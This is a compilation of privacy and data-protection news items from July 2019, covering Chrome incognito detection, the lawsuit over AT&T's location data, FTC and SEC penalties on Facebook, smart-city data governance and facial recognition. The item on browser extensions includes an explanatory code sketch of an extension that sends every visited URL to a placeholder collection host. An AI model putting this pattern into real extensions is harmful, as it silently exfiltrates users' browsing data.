
Google’s latest update to its Chrome browser protects user privacy by preventing “unacceptable audience monitoring” by publishers. Before the update, publishers could detect when visitors were browsing in incognito mode and prompt them to use a different browser or log in to the site. Google News and Web Partner Development Manager Barb Palser said that workaround was an “unintended loophole.” In a recent blog post, Palser wrote, “In situations such as political oppression or domestic abuse, people may have important safety reasons for concealing their web activity and their use of private browsing features. We want you to be able to access the web privately, with the assurance that your choice to do so is private as well.” [Adweek]

Law Enforcement

CA – RCMP Accidentally Revealed Suicide Attempt Info to 160 People

The Royal Canadian Mounted Police accidentally sent the details of an individual’s suicide attempt to the inboxes of more than 160 people, CBC News reports. According to a copy of a Privacy Act breach report on the incident, the details included the person’s name, date of birth, the details of the suicide attempt, the injuries they suffered and the hospital where they recovered. RCMP Spokesperson Corporal Caroline Duval said the Office of the Privacy Commissioner of Canada has been notified of the incident. Meanwhile, Vice reports the RCMP’s use of drones has doubled since 2015. [CBC.ca]

CA – Police Seek Internet-Based Access to Info for Media After Privacy Commissioner Finding Silences Scanners

Both Saskatoon and Regina police services say they have closed their scanner channels to media to comply with the Local Authority Freedom of Information and Protection of Privacy legislation [see here & here]. Municipal police services in the province became subject to the act at the beginning of 2018. The act allows media and members of the public to file freedom of information requests to obtain records not otherwise publicly disclosed. After the Saskatoon Police Service became subject to the act, it reviewed its information-sharing agreements, including media access to its main dispatch channel. It sought the advice of Saskatchewan Information and Privacy Commissioner Ron Kruzeniski [here] on the matter, and he advised the service that the long-standing practice did not comply with the legislation. The service plans to have a “next best” solution in place sometime this fall that’s expected to be internet-based, saying it values “the transparency and accountability it has established with the media and the public” and has already held meetings with media outlets. Kruzeniski said his recommendation was rooted in considerations about the protection of personal information, specifically that the legislation says it shouldn’t be disclosed to others unless the local authority — in this case, the police — has the individual’s consent. There are some exceptions that do allow police to disclose information to the public without getting an individual’s consent. “After these technological changes are made and people look at personal information, it’s kind of up to the police and the media outlets to work out some sort of arrangement that will work for both of them,” he said. The Regina Police Service followed Saskatoon in conducting a privacy review. On July 5, the service terminated its Media Radio agreement with four local outlets in the city. It too is looking for an alternate means of sharing information with media. Lawyer Sean Sinclair [see here & blog note here], who represents media outlets including the Saskatoon StarPhoenix and Regina Leader-Post, said there is a public interest in the timely release of such information, and that very little private information is transmitted over the police scanners in any case. “There is a huge public interest in ensuring that the media have access to that timely information so that they can alert the public to the issues that are occurring. Looking at this from a very practical point of view, there is very little downside to what the prior arrangements were and there were significant benefits,” Sinclair said. Such alerts could include street closures or locations of traffic accidents to avoid, but could also include warning the public to stay out of an area where a high-speed police pursuit is taking place. Sinclair said if the media cannot provide this service as it has in the past, police would need to do it themselves — meaning there would be a greater use of police resources for communications. [Saskatoon StarPhoenix | Police removing media access to radio scanners in Sask]

Location

US – AT&T Sued by CA Customers for Selling Location Data to Aggregators

On July 16 AT&T was sued in the Northern District of California by the Electronic Frontier Foundation [read PR here & overview here], representing customers who allege that AT&T sold their location data to data aggregators without their consent. The proposed class action suit was filed on behalf of all AT&T wireless customers from 2011 to date [see Scott et al v. AT&T Inc. et al here & 80 pg PDF complaint here]. The suit alleges that AT&T sold customers’ location data, without their consent, to LocationSmart and Zumigo [see here], third-party service providers that provide location-based services to corporations [view related post]. Wireless companies agreed to limit the sale of location data last year at the request of several members of Congress. The suit alleges that AT&T failed to protect the customers’ confidentiality and that it breached its duties to customers by disclosing location information to “thousands of third parties for years.” According to the suit, AT&T’s sharing of location-based information with third parties was not transparent, and customers were unaware that the information was being shared while they were using their phones. The suit asks for monetary damages and an order banning the sale of location-based information. AT&T denies the allegations, stating that it only shares location data with customers’ consent and that it stopped sharing location data with aggregators after it pledged to do so. [Data Privacy + Security Insider (Robinson+Cole) | EFF Hits AT&T With Class Action Lawsuit for Selling Customers’ Location to Bounty Hunters | Courthouse News Service]

Online Privacy

WW – Popular Photo Apps May Provide Data to Governments

The growth of photo apps has caused concern over tech companies’ potential collaboration with governments. Pointing to popular Chinese programs, a CNBC report notes how the absence of a framework to protect data from a government request could expose user data. Leland Miller, CEO of independent data-tracking company China Beige Book, said anyone using a Chinese app is “vulnerable” to government access and added, “there is no law sufficient enough to safeguard user data if the government chooses to request this information.” [CNBC]

CN – Apps Collect Too Much User Data: Regulators

Chinese regulators are investigating a number of firms whose financial apps may be collecting more user data than necessary. China’s Personal Information Protection Task Force on Apps found the apps accessed large amounts of user data without consent. It also found the firms did not provide clear data protection guidelines to users. Firms responsible for nearly 40 smartphone apps have been given 30 days to address the issues. [TechNode]

WW – Browser Extensions Gathered Data from 4M Chrome, Firefox Users

Washington Post Technology Columnist Geoffrey Fowler and Security Researcher Sam Jadali discovered that six browser extensions had gathered data from 4 million Chrome and Firefox users. The extensions collected the information without authorization from either browser maker. Jadali found the extensions, which included Hover Zoom and FairShare Unlock, were able to obtain sensitive information, such as tax returns, medical records, credit card information, vehicle identification numbers, Facebook photos and home surveillance videos found on security devices. Data collected by the extensions was shared with data broker Nacho Analytics, which sold access to it for $10 to $49. Mozilla and Google were both notified of the practices. The tech companies issued statements telling users the leaks have stopped. [Consumer Reports]
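For context on the mechanism (the actual code of these extensions was not published, so this is a generic sketch): an extension granted the browser’s tabs permission can observe every URL a user visits, and full URLs alone can carry document IDs, tokens and query strings that resolve to tax portals, medical records or shared photos. The collection endpoint below is hypothetical:

```typescript
// Generic sketch of URL harvesting by an over-permissioned extension.
// Assumes the standard chrome.tabs API and the "tabs" permission;
// collector.example.com is a hypothetical endpoint, not a real service.
declare const chrome: any; // supplied by the browser in an extension context

chrome.tabs.onUpdated.addListener(
  (tabId: number, changeInfo: { url?: string }) => {
    if (changeInfo.url) {
      // The visited URL, including its query string, is exfiltrated as-is.
      fetch("https://collector.example.com/log", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ url: changeInfo.url, ts: Date.now() }),
      });
    }
  }
);
```

Note that nothing in the sketch requires reading page contents; the URL stream alone is the product being resold.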

WW – Android Apps Delayed Upgrade to Prolong Data Collection

When Android 6 (Marshmallow) was released in October 2015, it included a change that allowed users to grant permissions individually, at runtime, rather than granting apps blanket permissions at install time. Researchers at the University of Maryland found that some app developers delayed updating their apps to target Android 6 so they could keep taking advantage of the older, less restrictive permission model: by declaring themselves “legacy apps,” they were able to keep using the all-or-nothing permission mechanism. Developers who delayed upgrading their apps did, however, begin receiving negative reviews in the app store. [zdnet: Permission-greedy apps delayed Android 6 upgrade so they could harvest more user data]

US – FTC to Issue Fine Over YouTube Kids’ Privacy Violations

The U.S. Federal Trade Commission has finalized a settlement with Google that includes a multimillion-dollar fine over findings that the company inadequately protected kids who used YouTube. The FTC, which voted along party lines to approve the settlement, also found the tech giant improperly collected kids’ data in breach of the Children’s Online Privacy Protection Act. The amount of the fine has not been disclosed. The Department of Justice is currently reviewing the details of the settlement. [The Washington Post]

Other Jurisdictions

AU – Australia Seeks Creation of Office to Regulate Tech Companies

An Australian Competition and Consumer Commission report recommends the country create an office to examine how tech companies, such as Facebook and Google, use algorithms to send targeted ads, Reuters reports. Australian Treasurer Josh Frydenberg accepted the ACCC’s “overriding conclusion that there is a need for reform,” adding the Australian government intends to “lift the veil” on the algorithms the tech companies use to gather and monetize user data. The office would be a branch of the ACCC and was one of 23 recommendations made by the agency in its report, which also included calls for enhanced privacy laws and protections for news media. [Reuters]

AU – NSW Seeks Public Consultation on Mandatory Breach Reporting

The New South Wales Information and Privacy Commission announced the Department of Communities and Justice has released a discussion paper for mandatory reporting of data breaches by public agencies in the state. The department seeks public consultation on the proposed requirement to notify the NSW privacy commissioner and affected individuals of a breach and on the operation of the notification scheme. Breach reporting isn’t currently mandatory in the Australian state. The discussion paper comes after the NSW opposition party introduced a bill in June that called for mandatory breach notifications for government agencies. [ipc.nsw.gov.au]

AU – Law Council of Australia Calls for Warrants to Access Telcom Metadata

The Law Council of Australia has called for the use of warrants when enforcement agencies seek to access metadata from the country’s telecommunication companies. Enforcement agencies currently have access to two years’ worth of data without a warrant. In a submission to the Parliamentary Joint Committee on Intelligence and Security, the council wrote, “The Law Council considers that access to the telecommunications data by a particular agency should only be accessible by warrant unless the access is strictly necessary due to an emergency situation,” adding that protections extended to journalists should be broadened to the whole population. [ZDNet]

Privacy (US)

US – FTC Sues Cambridge Analytica, Settles With Former CEO and App Developer

Following its announcement of a $5 billion fine for Facebook [read FTC PR here], the Federal Trade Commission filed a lawsuit against the company at the center of the privacy scandal, Cambridge Analytica. The complaint says that the data firm was responsible for “deceptive acts and practices to harvest personal information from Facebook users” [read FTC PR notice here & 14 pg PDF complaint here]. The FTC also settled with app developer Aleksandr Kogan [read 10 pg PDF here], who worked for the firm, and former Cambridge Analytica CEO Alexander Nix [read 10 pg PDF here]. The two agreed to follow FTC orders and destroy all personal information acquired. Cambridge Analytica shut down in May 2018 following the Facebook privacy scandal. On Wednesday, the FTC announced that Facebook will pay a $5 billion fine for how it handled its users’ privacy, including violations of a 2012 order from the commission. At the same time, Facebook settled with the Securities and Exchange Commission for $100 million after a probe found the social media company didn’t warn investors about third parties violating Facebook policies. [TechCrunch | FTC sues Cambridge Analytica, settles with firm’s former CEO and app developer]

US – Facebook Agrees to $100 Million SEC Settlement After Privacy Probe

The Securities and Exchange Commission announced that it will fine Facebook $100 million as part of a settlement in relation to a probe into the social network’s handling of users’ data [read SEC PR here & 16 pg PDF complaint]. It alleged that Facebook’s public disclosures didn’t offer sufficient warning that developers and other third parties who obtained user data may have violated the social network’s policies or failed to gain user permission. It said that Facebook “presented the risk of misuse of user data as merely hypothetical,” when it knew that the data had actually been misused. The SEC, along with the Federal Trade Commission and other federal agencies, began probing Facebook in July 2018 following Facebook’s disclosures in March 2018 that Cambridge Analytica, a digital consultancy that had ties to the Trump presidential campaign, improperly accessed personal information of up to 87 million of the social network’s users. “Public companies must accurately describe the material risks to their business,” said Stephanie Avakian, co-director of the SEC’s enforcement division. “As alleged in our complaint, Facebook presented the risk of misuse of user data as hypothetical when they knew user data had in fact been misused. Public companies must have procedures in place to make accurate disclosures about material business risks.” Facebook’s general counsel, Colin Stretch, wrote that the social network shares the SEC’s interest in transparency, and noted that it’s updated its disclosures and controls accordingly [read blog post]. The FTC also unveiled its $5 billion settlement with Facebook on Wednesday over the Cambridge Analytica scandal. Facebook said the agreement “will mark a sharper turn toward privacy, on a different scale than anything we’ve done in the past,” while CEO Mark Zuckerberg said in a separate statement that the social network would make “major structural changes” to how it builds products and conducts business. The broad strokes of the FTC settlement have been rumored for months and Facebook has already set aside the money to pay the fine, the largest the agency has levied against a tech company. In 2012, the FTC fined Google a record-setting $22.5 million. [CNET News | Facebook to Pay $100 Million SEC Fine Over Cambridge Data Use | Facebook to pay separate $100 million SEC fine over Cambridge Analytica scandal]

US – FTC Launches New Webpage for ‘Do Not Call,’ Robocall Data

The U.S. Federal Trade Commission has announced the creation of a new interactive webpage carrying data regarding the National Do Not Call Registry and telemarketing robocalls. The new page, which will be updated quarterly, allows users to view state- and county-specific data related to the number of DNC and robocall complaints. Additionally, the page is able to show the types of calls garnering the most complaints in a state while tracking the trends of the calls over time. [FTC]

US – FTC Looks for Comments on COPPA Rule

The U.S. Federal Trade Commission announced it will accept comments on the effectiveness of amendments made to the Children’s Online Privacy Protection Rule back in 2013. The COPPA Rule requires websites that collect data from users under the age of 13 to provide notice and obtain consent from parents whenever a child’s data is collected, used and disclosed. The FTC seeks feedback on whether the rule affected young users’ ability to access the sites and if the rule properly defines an online service or website that is “directed to children.” The agency will host a workshop on this topic Oct. 7. Comments will be accepted for 90 days once a notice is published in the Federal Register. [FTC.gov]

US – Google Faces Class Action for Allegedly Recording Voices Without Consent

A class-action complaint has been filed in a U.S. District Court in California alleging that Google violated state laws regarding consent and voice recordings. The plaintiffs argue that Google’s smart software, including Google Assistant and Google Home, recorded conversations “on multiple occasions, including when they failed to utter a hot word.” The plaintiffs’ lawyers wrote in their complaint that “California’s privacy laws recognize the unique privacy interest implicated by the recording of someone’s voice. That privacy interest has been heightened by companies exploiting consumers’ private data.” [MediaPost]

US – Study: Organizational Accountability in U.S. Law and Its Relevance to a Federal Data Privacy Law

Hunton Andrews Kurth’s Centre for Information Policy Leadership [CIPL: see here] recently published a white paper: Organizational Accountability’s Existence in U.S. Regulatory Compliance and its Relevance for a Federal Data Privacy Law [read 25 pg PDF here — also see its related Q&A document on organizational accountability in data protection, 10 pg PDF here]. The White Paper looks at the origins and applications of organizational accountability in U.S. law, and concludes that accountability’s current role in U.S. regulatory frameworks lends significant support for including accountability in any new federal privacy law. Specifically, the White Paper examines the elements of accountability as they relate to: 1) The Foreign Corrupt Practices Act and the accompanying 2012 resource guide [see here & 130 pg PDF] produced by the U.S. Department of Justice and the Securities and Exchange Commission; 2) The Sarbanes-Oxley Act of 2002 and Chapter Eight of the U.S. Sentencing Commission Federal Sentencing Guidelines Manual [see here & 608 pg PDF]; 3) The U.S. Department of Justice Criminal Division Guidance on the Evaluation of Corporate Compliance Programs [see 19 pg PDF]; 4) The Federal Financial Institutions Examination Council Bank Secrecy Act/Anti-Money Laundering Examination Manual [see 10 pg PDF here]; and 5) The Department of Health and Human Services Office of Inspector General Compliance Program Guidance for Hospitals [see here]. [Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

US – Report: Equifax Emphasizes Data Security Culture Following Data Breach

After its 2017 data breach, Equifax has taken measures to enhance its cybersecurity practices. The credit-monitoring firm has spent more than $1 billion on cybersecurity since the incident and has allocated an additional $1.25 billion for tech and security between 2018 and 2020. The company has also hired 1,000 IT and cybersecurity employees over the past year. Before the firm reached its settlement with the U.S. Federal Trade Commission, Equifax Chief Information Security Officer Jamil Farshchi said it had looked more closely at the progress of security projects and ensured detailed reports were sent to the board. [Wall Street Journal]

US – EPIC Challenges FTC-Facebook Settlement

The Electronic Privacy Information Center is attempting to block automatic approval of the U.S. Federal Trade Commission’s $5 billion settlement with Facebook. EPIC filed a complaint with a Washington court, saying the settlement “wipes Facebook’s slate clean without Facebook even having to admit guilt for its privacy violations.” EPIC has requested a hearing that would consider consumer complaints along with reviewing the deal’s parameters. Granting a hearing would potentially force the FTC to revise the settlement after hearing consumer complaints. [The New York Times]

Privacy Enhancing Technologies (PETs)

US – Multi-Institution Research Project to Tackle Privacy Policy Confusion

The National Science Foundation is funding a $1.2 million research project aiming to enable users to ask questions when reviewing privacy policies. Researchers from Penn State, Carnegie Mellon University and Fordham University will collaborate to create software designed to help people understand the privacy policies of apps and websites. Shomir Wilson, assistant professor at Penn State’s College of Information Sciences and Technology and a principal investigator on the project, said, “If users are given privacy information in ways they can understand, they’re more likely to make decisions that align with their interests and feel secure.” A 2017 Deloitte study found 90% of people consent to legal terms and conditions without reading them. [Penn State News]

RFID / IoT

CA – AB OIPC Rules that a Vehicle’s GPS Data is “Personal Information”

A July 8 decision by the Alberta Privacy Commissioner [see Order P2019-04: 17 pg PDF here & CanLII here] has confirmed that while an organization’s requirement for independent contractors to install GPS tracking devices on their vehicles will not necessarily violate applicable privacy legislation, the data collected may still be considered “personal information”. The case involved a complaint by independent contractors retained by NAL Resources Management Ltd. [see here] NAL required the contractors to install GPS devices on their vehicles, with a default setting of “on”, so as to “promote good driving behavior” and allow NAL to locate the contractor in the event of a “Safety Line call out.” The independent contractors filed a complaint alleging the data was “personal information” and that NAL therefore required their consent for its collection, use, or disclosure. The decision turned on the definition of “employee” in Alberta’s Personal Information Protection Act [see OIPC guidance here & 64 pg PDF here], and on whether the information collected by the GPS constituted “personal employee information” or “personal information”. If the information was “personal information”, the contractor’s consent would be required for its collection, use, and disclosure; if it was “personal employee information”, no consent was required. The commissioner found that the GPS data had a personal dimension, given that it would enable NAL to determine the physical location of the contractor as an individual, which could be expected to have personal consequences for the contractors as individuals. Accordingly, the GPS tracking data was “personal information.” However, the commissioner also determined that in the circumstances the data qualified as “personal employee information”, for which no consent is needed, because the independent contractors were considered “employees” under the act. The commissioner reasoned that information about a contractor reasonably required by an organization to manage a contractual relationship is “personal employee information” under PIPA, regardless of the fact that, at common law, independent contractors are not considered employees. This decision is a solid reminder that words such as “employee” can carry different meanings across different legislation. It is also a reminder that employers need to seriously consider whether any productivity/data-tracking services are collecting “personal information” under their province’s specific privacy legislation. While this was a decision of Alberta’s privacy commissioner, the definition of “personal information” is mirrored in the federal privacy legislation, PIPEDA [OPC guidance here]. [Strigberger Brown Armstrong Blog]

Smart Cities

CA – Data Governance for Data Sharing: Lessons from IESO for Toronto’s Quayside?

Teresa Scassa – Smart city data governance has become a hot topic in Toronto in light of Sidewalk Labs’ proposed smart city development for Toronto’s waterfront [see here, here & wiki here]. In its Master Innovation Development Plan [MIDP: see here, also access & download draft master plan here & here], Sidewalk Labs has outlined a data governance regime for “urban data” that will be collected in the development. It sets out to do a number of different things: 1) it provides a framework for sharing ‘urban data’ with all those who have an interest in using it, which could include governments, the private sector, researchers or civil society; and 2) it proposes that a governance body, the Urban Data Trust (UDT), be charged with determining who can collect data within the project space, and with setting any necessary terms and conditions for such collection and for any subsequent use or sharing of the data. The five-person governance body will have representation from different stakeholder communities, including “a data governance, privacy, or intellectual property expert; a community representative; a public-sector representative; an academic representative; and a Canadian business industry representative”. The merits and/or shortcomings of this proposed governance scheme will no doubt be hotly debated as the public is consulted and as Waterfront Toronto develops its response to the MIDP. In spite of the apparent novelty of data trusts, there are already many different existing models of data governance for data sharing, and these models may offer lessons that are important in developing data governance for smart city developments. Merlynda Vilain [here] and I have just published a paper that explores one such model [see: Governing Smart Data in the Public Interest: Lessons from Ontario’s Smart Metering Entity here or 26 pg PDF here]. In the early 2000s the Ontario government decided to roll out mandatory smart metering for electrical consumption in the province [read about the history of the program here]. The proposal raised privacy concerns, particularly because detailed electrical consumption data could reveal intimate details about the activities of people within their own homes. The response to these concerns was to create a data governance framework that would protect customer privacy while still reaping the benefits of the detailed consumption data. The Smart Metering Entity [SME: here], the data governance body established for smart metering data, provides an interesting use case for data governance for data sharing. We carried out our study with this in mind; we were particularly interested in seeing what lessons could be learned from the SME for data governance in other contexts. We found that the SME made a particularly interesting case study because it involved public sector data, public and private sector stakeholders, and a considerable body of relatively sensitive personal information. It also provides a good example of a model that had to adapt to changes over a relatively short period of time – something that may be essential in a rapidly evolving data economy. 
[The remainder of this blog post provides an overview of Scassa’s and Vilain’s findings] [Teresa Scassa Blog] SEE ALSO: Apple Publicly Trolls Google Over Controversial Smart City Surveillance Plans | From heated bike lanes to privacy concerns: What you need to know about Sidewalk Labs | Toronto civic leaders urge public officials to ‘welcome’ Sidewalk Labs’ plan | Business leaders push for Sidewalk Labs smart-city development to be built on Toronto’s waterfront | Sidewalk Labs decision to offload tough decisions on privacy to third party is wrong, says its former consultant | Ann Cavoukian still has problems with Sidewalk Labs’ approach to data with Quayside | Commissioner recommends updating privacy laws to prepare for smart cities ]

UK – ICO Announces First Data Protection Sandbox Participants

On July 29, 2019, the UK Information Commissioner’s Office (ICO) announced the 10 projects that it has selected, out of 64 applicants, to participate in its sandbox [read detailed PR]. The sandbox [read ICO blog post], for which applications opened in April 2019, is designed to support organizations in developing innovative products and services with a clear public benefit. The ICO aims to assist the 10 organizations in ensuring that the risks associated with the projects’ use of personal data are mitigated. The selected participants cover a number of sectors, including travel, health, crime, housing and artificial intelligence. The projects selected by the ICO include proposals by government institutions: 1) Greater London Authority [here – looking at the Violence Reduction Unit]; 2) Heathrow Airport Holding Limited [see here – looking at the use of facial recognition technology]; 3) NHS Digital [here – looking at collecting and managing patient consents for data sharing]; and 4) Ministry of Housing, Communities and Local Government [here – looking at matching personal information controlled by multiple parties in the rental sector]. Private organizations participating in the sandbox include: 5) FutureFlow [here – looking at collaborative approaches to tackling financial crime]; 6) Novartis Pharmaceuticals UK Limited [here – looking into the use of voice technology within healthcare]; 7) Trust Elevate [here – looking into verified parental consent and age checking of a child]; 8) Jisc [here – developing a Code of Practice with universities wishing to investigate the use of student activity data]; 9) Onfido [here – looking at how to identify and mitigate algorithmic bias in machine learning models]; and 10) Tonic Analytics [here – looking at use of innovative data analytics technology to improve road safety and to prevent and detect crime]. Read more about participants & proposals here. The projects are expected to have completed their participation in the sandbox by September 2020. In announcing the selected projects, Information Commissioner Elizabeth Denham highlighted the mutual benefit of the sandbox, stating that “the sandbox will help companies and public bodies deliver new products and services of real benefit to the public, with assurance that they have tackled built-in data protection at the outset.” [Privacy & Information Security Law Blog (Hunton Andrews Hurth)]

HK – Hong Kong Limits Functions on New Smart Lampposts

Smart lampposts being deployed in Hong Kong will be used with limited features as the government responds to privacy concerns. The government is deactivating a function that detects vehicle speed using Bluetooth-device recognition, another that detects car types using license plate recognition, and one that monitors the dumping of industrial waste at blackspots. “We do not have any functions for facial recognition … even for traffic snapshots, we will decrease the quality to a point that faces cannot be recognised, before the data is made public,” Assistant Government Chief Information Officer Tony Wong said, adding that a public consultation will be held to further alleviate privacy concerns. [Hong Kong Free Press]

Surveillance

CA – New Fredericton Transit on-Board Cams, Wi-Fi Raise Privacy Concerns

Fredericton Transit has introduced on-board cameras and free Wi-Fi to three buses this week — a pilot project the city says will improve transit services and, ultimately, rider experience [read announcement]. According to transit manager Meredith Gilbert, the cameras, which cost about $5,000 in total, will capture movement data, and the Wi-Fi will “capture user data just by tracking cellphone use through the Wi-Fi in terms of where people are coming and going.” Gilbert said the project could eventually lead to real-time information gathering — information that could be shared with riders and keep them updated on the status of service routes. When asked about privacy concerns, Gilbert said the city has followed best practices outlined by the Office of the Integrity Commissioner, which has taken on the responsibility as the province’s privacy watchdog. “There should be no concerns for customers,” she said. But integrity commissioner Charles Murray [read bio] — the province’s privacy watchdog — has questions about the collection and use of private data and how the public will be protected. Murray said the transit authority needs to be certain that riders understand what it’s doing with their data. “There has to be a pretty direct connection between your collection and the usage you plan to make of the data because in the era of big data the temptation is, ‘Well, let’s just take it all in and then we’ll see what we’ve got,’” Murray said. “But the law and the best practices don’t align with that. You need to have a pretty clear idea of what you’re looking for and then you can build your safeguards for privacy based on that and then you’re taking out only what you want.” He said the city is “kind of vague” in that regard. The Office of the Integrity Commissioner would be the main oversight authority for a public body when it comes to matters of privacy, Murray said, but because of resource constraints a review is only triggered by a complaint. Murray also raised the issue of riders being unable to opt out from being captured on camera if the project expands: users would be faced with sharing data or not taking the bus. “One of the things we often talk about in the privacy world is the capacity for people to opt out,” he said. “How do they protect themselves? And it doesn’t strike me like a system like this as described provides much options there.” The pilot project, part of Fredericton Transit’s strategic plan, will be evaluated in January. [CBC News]

Telecom / TV

US – NYC Lawmakers Propose Bill That Bans Sale of Cellphone Location Data

Lawmakers in New York City are introducing a bill that would make it illegal for cellphone companies and mobile apps to share user location information collected in the city without the customer’s permission. In addition to providing steep fines, ranging from $1,000 per violation to $10,000 per day per user for multiple violations, the bill also gives customers the right to sue if their data has been shared without their permission. The proposed legislation “would also exclude the collection of location data in ‘exchange for products or services.’” If the bill goes into effect, New York City will be the first city to ban the sale of location data to third parties. [The New York Times]

US Government Programs

US – New Federal Policy Regarding CDOs and Data Governance

The Office of Management and Budget [OMB: here] has issued a memorandum that moves the federal government forward in embracing the importance of the “governance” of data. On July 10, 2019, OMB issued the memorandum [see: M-19-23 “Phase 1 Implementation of the Foundations for Evidence-Based Policymaking Act of 2018: Learning Agendas, Personnel, and Planning Guidance”]. The Foundations for Evidence-Based Policymaking Act [Evidence Act], enacted on January 14, 2019, mandates Federal evidence-building activities, open government data, and confidential information protection and statistical efficiency. It includes provisions for the appointment by each agency of a Chief Data Officer and the establishment of a CDO council [on this point read earlier blog post here]. The OMB memorandum announces a commitment to aligning related data and information policy guidance across government in four phases, the first of which is categorized as “Learning Agendas, Personnel and Planning.” Some of the key elements for implementation of Phase 1 are the following: 1) All agencies are required to create “Learning Agendas,” which identify and set priorities for evidence building at the agency in consultation with various stakeholders. The memorandum sets out a series of deadlines for accomplishing Learning Agendas through February 2022. A detailed Appendix to the memorandum provides further guidance on Learning Agendas; 2) All agencies are to have designated individuals in the position of Chief Data Officer by July 13, 2019. CDOs shall have authority and responsibility for data governance and lifecycle data management at each agency. In addition, agencies covered under the Chief Financial Officers Act of 1990 shall be required to designate Evaluation Officers and Statistical Officials, and all agencies are encouraged to do so as well; 3) By September 30, 2019, the head of each agency is required to establish an agency Data Governance Body, chaired by the CDO, with participation from relevant senior-level staff in agency business units, data functions, and financial management. The Data Governance Body “will set and enforce priorities for managing data as a strategic asset to support the agency in meeting its mission and, importantly, answering the priority questions laid out in the agency Learning Agenda.” A detailed Appendix to the memorandum provides further guidance on constituting data governance and leadership; 4) A Chief Data Officer Council will consist of all agency Chief Data Officers, the Administrator of the Office of Electronic Government, and the Administrator of the Office of Information and Regulatory Affairs [OIRA]. The CDO Council will meet regularly to establish government-wide best practices for the use, protection, dissemination, and generation of data, and will promote various best practices as further set out in the memorandum; and 5) Each agency is also to develop and maintain an Open Data Plan, as required by the Evidence Act, which describes the agency’s efforts to make government data open to the public. Each Open Data Plan is to be included in the agency’s Strategic Information Resources Management Plan. OMB will provide further guidance on Open Data Plans in the next phase of implementation of the Evidence Act. 
As the new OMB memorandum makes clear, the role and functions of the CDO, and the emergence of a requirement for a designated Data Governance Body at each federal agency consisting of senior-level staff, reflects the growing maturity of the discipline of information governance generally [on this point read earlier blog post here]. [DBR on DATA (Drinker Biddle)]

US Legislation

US – Sen. Hawley Introduces Bill to Halt ‘Social Media Addiction’

U.S. Sen. Josh Hawley, R-Mo., has proposed a bill that would limit the techniques that keep social media users glued to their platforms. Hawley’s aim with the Social Media Addiction Reduction Technology Act is to curb the incessant attention paid to platforms such as Twitter, Instagram and Snapchat by removing features like infinite scroll and autoplay video. “Too much of the ‘innovation’ in this space is designed not to create better products, but to capture more attention by using psychological tricks that make it difficult to look away,” Hawley said in a statement. “This legislation will put an end to that and encourage true innovation by tech companies.” [Washington Post]

US – Sens. Drawing Up Federal Privacy Bills

There are two ongoing efforts within the U.S. Senate to draft a federal privacy bill. U.S. Sens. Jerry Moran, R-Kan., and Richard Blumenthal, D-Conn., are crafting a bill with provisions that would increase enforcement by the Federal Trade Commission and take precedence over any state law. Meanwhile, Sen. Maria Cantwell, D-Wash., is working with Sens. Roger Wicker, R-Miss., and Brian Schatz, D-Hawaii, on a separate draft that has been circulating through the Senate. Wicker said his group is still mulling data security and a private right of action in their bill. All five senators were previously collaborating on a single bill as part of the Senate Committee on Commerce, Science, and Transportation. [Bloomberg Law]

Workplace Privacy

US – Privacy Class-Action Lawsuit Over Employee Fingerprint Scans

A class-action lawsuit has been filed against Saporito Finishing alleging violation of the Illinois Biometric Information Privacy Act. Plaintiff Elliot Smart alleges the metal-finishing company made employees clock in and out of work using their fingerprints without obtaining permission or consent as required by law. Smart also claims the company never informed him how the company stores the information. He is seeking damages of $1,000 to $5,000 per violation. The lawsuit was filed just weeks after a similar class-action lawsuit was filed against a Chicago blood test laboratory. [Cook County Record]

+++


1-15 July 2019

Biometrics

US – FBI, ICE Use Driver’s Licenses in Facial-Recognition Surveillance

The U.S. Federal Bureau of Investigation and Immigration and Customs Enforcement have been using state driver’s license databases for facial-recognition searches without the drivers’ knowledge or consent. Neither Congress nor state legislatures have approved distributing driver information using this technology. San Francisco and Somerville, Massachusetts, have banned the use of facial-recognition technology by law enforcement and public agencies. Officials from the agencies are expected to testify on their use of the technology at a House Committee on Homeland Security hearing later this week. [The Washington Post | FBI, ICE using state driver’s license photos without consent for facial recognition searches: report]

US – Face Datasets Used to Train Facial-Recognition Tech

Databases of people’s faces are being compiled without their knowledge and shared around the world. The datasets contain images pulled from social media, photo websites and cameras in restaurants and on college campuses. Some datasets contain thousands of images, but others contain millions. Privacy advocates have raised concerns over a lack of oversight of the datasets, noting that people’s faces are being used to create “ethically questionable technology.” While Facebook and Google do not distribute face datasets, other companies have shared images with governments of other countries “for training artificial intelligence.” [New York Times]

CA – BCLC Facial-Recognition Tests Producing High Number of False Positives

A facial-recognition system used by the British Columbia Lottery Corporation to keep troublesome patrons out of casinos has produced a high rate of false positives. Of the 3,647 alerts to come out of the system, 3,255 were rejected. The system accepted 387 results; however, only 26 were confirmed by staff members, according to the documents. “These systems are complicated. It was overpromised in the first place. Surveillance is something that is selling a sense of security and a sense of control. And that’s always partial. It’s always incomplete,” Freedom of Information and Privacy Association President Mike Larsen said. BCLC plans to continue testing the system at one casino through 2020. [CTV News]
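The reported numbers are worth turning into rates, since they imply that well under one per cent of alerts were genuine. A quick back-of-envelope calculation using only the figures quoted above (and treating staff confirmation as ground truth):

```typescript
// Confirmation rates computed from the figures reported above.
const totalAlerts = 3647; // alerts generated by the system
const accepted = 387;     // alerts the system itself accepted
const confirmed = 26;     // accepted alerts confirmed by staff

const overallRate = confirmed / totalAlerts; // ~0.7% of all alerts
const acceptedRate = confirmed / accepted;   // ~6.7% of accepted alerts

console.log(`${(overallRate * 100).toFixed(1)}% of all alerts were confirmed matches`);
console.log(`${(acceptedRate * 100).toFixed(1)}% of system-accepted alerts were confirmed`);
```

At roughly 0.7% overall precision, staff review about 140 alerts for every confirmed match, which puts Larsen's "overpromised" comment in context.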

UK – Researchers Urge Scotland Yard to Stop Using Facial-Recognition Tech

Researchers at the University of Essex are calling on Scotland Yard to stop using facial-recognition technology until “significant concerns” of the tech violating human rights laws are addressed, the Independent reports. The call comes after researchers found that four out of five “suspects” are innocent. The independent report, which was commissioned by the Metropolitan Police, raises concerns over watchlist criteria being out of date, operational failures and issues with “consent, public legitimacy and trust.” The Met gave researchers access to six out of ten trials over an eight-month period. [The Independent]

US – Coalition Asks US Government to Ban Facial Recognition on the Public

